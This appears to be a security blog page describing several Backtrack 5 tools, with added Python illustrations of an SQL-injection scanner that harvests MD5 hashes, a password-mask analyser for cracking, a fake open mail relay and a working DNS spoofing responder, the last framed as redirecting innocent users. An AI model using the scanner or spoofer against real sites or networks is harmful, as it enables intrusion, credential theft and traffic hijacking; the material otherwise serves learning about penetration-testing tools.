Information Security

keepnote – Backtrack 5 – Reporting Tools – Evidence Management – keepnote

KeepNote is a note-taking application installed by default in Backtrack Linux. Notes are an essential part of a security assessment, and of pretty much any technical project you work on, because there is no way to remember everything that happens over hours of work unless you have good notes. KeepNote lets you create multiple notebooks, directories under those notebooks, and attach notes at any level of the directory tree beneath the primary notebook.

sqlscan – Backtrack 5 – Information Gathering – Web Application Analysis – Web Crawlers – sqlscan

Need to query Google for vulnerable SQL-backed web pages and extract MD5 hashes from them? The sqlscan.py Python script is the tool for that. If you are using Backtrack release 5 you will first need to install Python 2.4.4 and then fix sqlscan.py by following the instructions here and here. Once sqlscan.py runs without errors, proceed to the example below.
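The core of what a scanner like sqlscan.py does once it has a list of candidate URLs is mechanical: append a single quote to each query parameter, fetch the page, look for database error strings, and harvest anything that looks like an MD5 digest from the erroring response. The added example below is my own illustration of that loop and is not sqlscan.py's code; it replaces the Google query with a fixed URL and replaces the HTTP request with a constructed fake response (the hostname target.test, the error-string list and the sample page are all made up for the example).

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Error strings that indicate an unescaped quote reached the database layer.
# This pattern list is my own selection; sqlscan.py carries its own.
SQL_ERROR_PATTERNS = [re.compile(p, re.I) for p in (
    r"You have an error in your SQL syntax",
    r"Warning: mysql_(fetch_array|num_rows|fetch_assoc)\(\)",
    r"supplied argument is not a valid MySQL result",
    r"Unclosed quotation mark after the character string",
    r"Microsoft OLE DB Provider for (SQL Server|ODBC Drivers)",
    r"ORA-\d{5}",
    r"pg_query\(\): Query failed",
)]

# 32 hex digits on a word boundary: the shape of an MD5 digest.
MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")


def probe_urls(url):
    """One probe URL per query parameter, each with a single quote appended to that parameter."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    probes = []
    for i, (name, value) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name, value + "'")          # urlencode turns the quote into %27
        probes.append(urlunsplit(parts._replace(query=urlencode(mutated))))
    return probes


def sql_error_hits(body):
    """Patterns of the error signatures found in a response body."""
    return [p.pattern for p in SQL_ERROR_PATTERNS if p.search(body)]


def extract_md5(body):
    """Distinct MD5-looking tokens in a response body, lower-cased."""
    return sorted({m.lower() for m in MD5_RE.findall(body)})


def assess(url, fetch):
    """Probe every parameter of url; fetch(probe_url) must return the body as text.

    Returns {probe_url: {"errors": [...], "md5": [...]}} for probes that triggered
    a database error.  Hashes are only harvested from erroring responses, so a page
    that legitimately displays hex strings does not count as a finding."""
    findings = {}
    for probe in probe_urls(url):
        body = fetch(probe)
        hits = sql_error_hits(body)
        if hits:
            findings[probe] = {"errors": hits, "md5": extract_md5(body)}
    return findings


# --- constructed sample target (no network): id= is injectable, cat= is not ---
_VULNERABLE_BODY = """<html><body>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource
You have an error in your SQL syntax; check the manual near ''' at line 1
<tr><td>admin</td><td>5f4dcc3b5aa765d61d8327deb882cf99</td></tr>
</body></html>"""
_CLEAN_BODY = "<html><body>Category listing, nothing to see.</body></html>"


def fake_fetch(probe_url):
    """Stand-in for an HTTP GET: returns an error page only when the id parameter was mangled."""
    return _VULNERABLE_BODY if "id=1%27" in probe_url else _CLEAN_BODY


if __name__ == "__main__":
    for probe, result in assess("http://target.test/item.php?id=1&cat=2", fake_fetch).items():
        print(probe)
        print("  errors:", result["errors"])
        print("  hashes:", result["md5"])
```

To use it against a live target you would pass a real fetcher (for example a function wrapping urllib.request.urlopen) in place of fake_fetch; keeping the fetch pluggable is also what makes the detection logic testable offline.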

dictstat – Backtrack 5 – Privilege Escalation – Password Attacks – Offline Attacks – dictstat

The dictstat Python script is a handy tool for analysing password cracking results or any regular wordlist. On Backtrack 5 R3 dictstat lives in the /pentest/passwords/pack directory and is run with “python dictstat.py” from within that directory. It was written by iphelix during the 2010 Crack Me If You Can password cracking competition and is part of a larger toolset called PACK (Password Analysis and Cracking Kit). Below we show some examples of dictstat in action along with details of the available parsing options.
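The statistics dictstat produces (length distribution, character-set classes and hashcat-style masks, each with a percentage of the list) are simple to compute, and seeing them computed makes it clear what a mask like ?l?l?l?l?l?l?d?d is telling you about a cracked set. The following is an added example written for this page, not dictstat's or PACK's code; the character-set names are my own and only loosely modelled on PACK's, and the sample passwords are constructed, not real cracking output.

```python
from collections import Counter


def mask_of(password):
    """hashcat-style mask: ?l lower, ?u upper, ?d digit, ?s anything else."""
    out = []
    for ch in password:
        if ch.islower():
            out.append("?l")
        elif ch.isupper():
            out.append("?u")
        elif ch.isdigit():
            out.append("?d")
        else:
            out.append("?s")
    return "".join(out)


def charset_of(password):
    """Name the character classes present (naming is my own, loosely after PACK)."""
    lower = any(c.islower() for c in password)
    upper = any(c.isupper() for c in password)
    digit = any(c.isdigit() for c in password)
    special = any(not (c.islower() or c.isupper() or c.isdigit()) for c in password)
    if lower and upper:
        name = "mixedalpha"
    elif lower:
        name = "loweralpha"
    elif upper:
        name = "upperalpha"
    else:
        name = ""
    if digit:
        name += "num" if name else "numeric"
    if special:
        name += "special"
    return name or "empty"


def analyze(words, min_length=None, max_length=None):
    """Count lengths, charsets and masks over an iterable of words, optionally length-filtered."""
    lengths, charsets, masks = Counter(), Counter(), Counter()
    total = 0
    for w in words:
        w = w.rstrip("\r\n")
        if not w:
            continue                      # blank lines are not passwords
        if min_length is not None and len(w) < min_length:
            continue
        if max_length is not None and len(w) > max_length:
            continue
        total += 1
        lengths[len(w)] += 1
        charsets[charset_of(w)] += 1
        masks[mask_of(w)] += 1
    return {"total": total, "lengths": lengths, "charsets": charsets, "masks": masks}


def report(stats, top=10):
    """Print each table most-common-first with its share of the analysed words."""
    total = stats["total"] or 1
    for section in ("lengths", "charsets", "masks"):
        print(f"[*] {section} (top {top}):")
        for key, count in stats[section].most_common(top):
            print(f"    {key!s:<24} {count:>6}  {100.0 * count / total:5.1f}%")


def analyze_file(path, **kw):
    """Stream a wordlist from disk; bad bytes are replaced rather than aborting the run."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return analyze(fh, **kw)


# Constructed sample of "cracked" passwords for the demonstration (not real data).
SAMPLE = ["password", "Password1", "123456", "letmein!", "qwerty",
          "P@ssw0rd", "abc123", "monkey", "", "Summer2012"]

if __name__ == "__main__":
    report(analyze(SAMPLE))
```

The mask table is the one that feeds back into cracking: the most common masks from an already-cracked set are the first masks worth running against the hashes that remain.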

spamhole – Backtrack 5 – Exploitation Tools – Social Engineering Tools – HoneyPots – spamhole

Unfortunately spamhole’s day is mostly behind us, though I wish I had been familiar with it earlier. The spamhole developers wrote it for like-minded individuals who wanted to help fight spam on the Internet by setting up as many fake open mail relays as possible, tricking spammers into sending their spam into blackholes or honeypots: the relay accepts the message and delivers it nowhere. It would have been extremely satisfying to watch spam enter a spamhole fake open relay I had created and be redirected to nothing. The spamhole application does not work on Backtrack 5 R3, as explained in more detail below.
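What a fake open relay has to do is small: speak enough SMTP that a spammer's relay test and subsequent bulk run are accepted, then drop the message body on the floor while keeping the envelope for analysis. The example below is an added illustration written for this page and is not spamhole's code; the hostname relay.example.test, port 2525 and the client dialogue are all constructed. The session logic is kept separate from the socket handling so it can be driven offline.

```python
import asyncio
import logging

log = logging.getLogger("blackhole-relay")


class BlackholeSMTP:
    """Minimal SMTP session: accepts any relay request, discards every message."""

    def __init__(self, hostname="relay.example.test"):
        self.hostname = hostname
        self.captured = []        # (sender, recipients, body size) per message; body dropped
        self.reset()

    def reset(self):
        self.sender = None
        self.recipients = []
        self.in_data = False
        self.data_bytes = 0

    def greeting(self):
        return f"220 {self.hostname} ESMTP ready\r\n"

    def handle_line(self, line):
        """Process one client line (CRLF stripped); return the reply, or '' for no reply."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                self.captured.append((self.sender, list(self.recipients), self.data_bytes))
                self.reset()
                return "250 OK: queued\r\n"      # a lie: nothing is queued anywhere
            self.data_bytes += len(line) + 2    # count bytes as they were on the wire
            return ""
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return f"250 {self.hostname}\r\n"
        if verb == "MAIL":
            self.sender = arg.partition(":")[2].strip()
            return "250 OK\r\n"
        if verb == "RCPT":
            if self.sender is None:
                return "503 Need MAIL first\r\n"
            self.recipients.append(arg.partition(":")[2].strip())
            return "250 OK\r\n"                 # any destination accepted: looks open
        if verb == "DATA":
            if not self.recipients:
                return "503 Need RCPT first\r\n"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>\r\n"
        if verb == "RSET":
            self.reset()
            return "250 OK\r\n"
        if verb == "NOOP":
            return "250 OK\r\n"
        if verb == "QUIT":
            return "221 Bye\r\n"
        return "500 Command not recognized\r\n"


async def _session(reader, writer):
    session = BlackholeSMTP()
    writer.write(session.greeting().encode())
    await writer.drain()
    while True:
        raw = await reader.readline()
        if not raw:
            break
        reply = session.handle_line(raw.decode("latin-1").rstrip("\r\n"))
        if reply:
            writer.write(reply.encode())
            await writer.drain()
            if reply.startswith("221"):
                break
    for sender, rcpts, size in session.captured:
        log.info("swallowed %d bytes from %s to %s", size, sender, rcpts)
    writer.close()


async def serve(host="127.0.0.1", port=2525):
    """Listen as a fake relay; run as root on port 25 to be found by spammers' scans."""
    server = await asyncio.start_server(_session, host, port)
    async with server:
        await server.serve_forever()


def run_dialogue(lines):
    """Drive one session offline with constructed client lines; return (replies, captured)."""
    session = BlackholeSMTP()
    replies = [session.handle_line(line) for line in lines]
    return [r for r in replies if r], session.captured


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    asyncio.run(serve())
```

The captured envelopes (sender, recipients, size) are the useful by-product: they tell you who is probing you and what they are trying to relay, without your host ever becoming a real relay.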

dnschef – Backtrack – Privilege Escalation – Spoofing Attacks – Network Spoofing – dnschef

If you want to spoof DNS responses then dnschef is the tool to do it. I can never get enough of redirecting innocent Internet surfers to random locations. The catch with dnschef is that you somehow have to get the victims’ DNS traffic to the Backtrack Linux server running it, for example by gaining access to a host and changing its configured DNS server, or by poisoning the real DNS server on the network. Below we show a couple of examples of dnschef in action; overall it is really easy to use, and the hard part is choosing the method you use to get the DNS (Domain Name System) traffic to the Backtrack server running dnschef.
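Once the traffic arrives, what a DNS spoofer actually does is answer the A query with whatever address you choose, reusing the query's ID and question so the resolver accepts it. The example below is an added illustration written for this page and is not dnschef's code: it encodes and parses the DNS wire format by hand, forges an answer for names matching a list (the wildcard matching is my approximation of the kind of fake-domain list dnschef lets you configure), and leaves everything else unanswered where a real tool would forward upstream. The names, addresses and IDs are constructed for the example.

```python
import socket
import struct


def build_query(qname, qid=0x1234, qtype=1):
    """Encode a minimal DNS query (A record by default) for qname."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)     # RD set, one question
    name = b"".join(bytes([len(label)]) + label.encode() for label in qname.split("."))
    return header + name + b"\x00" + struct.pack("!HH", qtype, 1)  # class IN


def parse_query(pkt):
    """Return (id, qname, qtype, raw question section) from a DNS query packet."""
    qid = struct.unpack("!H", pkt[:2])[0]
    off, labels = 12, []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            break
        labels.append(pkt[off:off + n].decode("ascii"))
        off += n
    qtype = struct.unpack("!H", pkt[off:off + 2])[0]
    return qid, ".".join(labels), qtype, pkt[12:off + 4]


def matches(qname, fakedomains):
    """True if qname equals an entry, or for '*.example' entries is that name or under it."""
    qname = qname.lower().rstrip(".")
    for pattern in fakedomains:
        pattern = pattern.lower()
        if pattern.startswith("*."):
            if qname == pattern[2:] or qname.endswith(pattern[1:]):
                return True
        elif qname == pattern:
            return True
    return False


def spoofed_response(query_pkt, fake_ip, fakedomains=None, ttl=60):
    """Build a forged A-record answer for the query, or None if it should be left alone."""
    qid, qname, qtype, question = parse_query(query_pkt)
    if qtype != 1:                       # only A lookups are forged here
        return None
    if fakedomains is not None and not matches(qname, fakedomains):
        return None                      # a real tool would forward this upstream
    header = struct.pack("!HHHHHH", qid, 0x8180, 1, 1, 0, 0)     # QR|RD|RA, one answer
    # 0xC00C is a compression pointer to the name at offset 12 (the question name).
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(fake_ip)
    return header + question + answer


def answer_ip(response):
    """Pull the IPv4 address out of a single-answer response built by spoofed_response."""
    return socket.inet_ntoa(response[-4:])


def serve(fake_ip, fakedomains=None, bind=("0.0.0.0", 53)):
    """UDP responder: answer matching A queries with fake_ip, stay silent on the rest."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    while True:
        pkt, peer = sock.recvfrom(512)
        try:
            reply = spoofed_response(pkt, fake_ip, fakedomains)
        except (IndexError, struct.error, UnicodeDecodeError):
            continue                     # malformed packet: drop it rather than crash
        if reply:
            sock.sendto(reply, peer)


if __name__ == "__main__":
    q = build_query("www.example.test")
    r = spoofed_response(q, "10.0.0.5", ["*.example.test"])
    print(parse_query(q)[1], "->", answer_ip(r))
```

Binding port 53 needs root, and staying silent on non-matching names means clients will time out on them unless you also forward those queries to a real resolver, which is the part dnschef handles for you.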